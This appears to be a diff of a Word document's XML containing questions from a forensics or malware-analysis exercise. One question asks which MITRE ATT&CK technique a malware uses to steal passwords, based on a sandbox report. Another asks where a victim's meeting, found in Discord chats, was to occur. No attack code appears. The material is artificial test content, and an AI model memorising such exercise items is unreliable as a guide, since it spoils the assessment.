-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4475,6 +3022,14 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q5</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4484,6 +3039,319 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>By</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>examining</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the MITRE ATT&amp;CK </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>techniques</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>displayed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Any.run</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>sandbox</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+        <w:proofErr w:type="spellStart"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>report</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> MITRE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>technique</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>not</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>sub-techniques</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>uses</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>steal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>user’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4493,558 +3361,6 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>After</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>examining</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Discord</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>conversations</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>we</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>discovered</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> he </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>had</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>arranged</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>meet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>friend</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>at</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>specific</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>location</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>you</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>determine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>where</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>this</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>meeting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>was</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>supposed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>occur</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="37"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
